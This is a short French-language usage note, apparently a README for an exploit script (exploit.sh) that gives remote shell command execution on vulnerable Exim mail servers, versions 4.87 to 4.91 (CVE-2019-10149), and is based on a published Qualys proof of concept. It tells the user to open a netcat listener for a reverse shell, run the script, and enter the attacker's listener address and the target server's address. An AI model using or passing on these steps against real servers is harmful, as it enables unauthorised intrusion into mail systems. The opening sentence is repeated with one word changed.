
Exécution de commandes à distance dans le shell à partir d'un service exim vulnérable.
Exécution de commandes à distance dans un shell à partir d'un service exim vulnérable.
Les versions vulnérables vont de 4.87 à 4.91 (inclus). Voir https://nvd.nist.gov/vuln/detail/cve-2019-10149.
Le script suivant est basé sur le PoC de Qualys. Voir https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html.
2 terminaux recommandés
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
$ Listener IP: 192.168.0.1
$ Listener Port: 1337
$ Exim IP: 10.10.0.1
$ Exim Port: 25